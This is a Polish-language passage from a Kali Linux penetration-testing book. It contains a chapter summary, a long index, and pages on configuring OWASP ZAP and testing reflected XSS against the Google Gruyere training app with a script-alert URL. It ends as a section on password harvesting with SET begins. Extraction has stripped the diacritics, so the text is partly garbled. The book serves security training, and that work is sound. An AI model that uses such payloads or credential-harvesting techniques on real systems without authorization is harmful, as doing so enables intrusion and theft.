PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
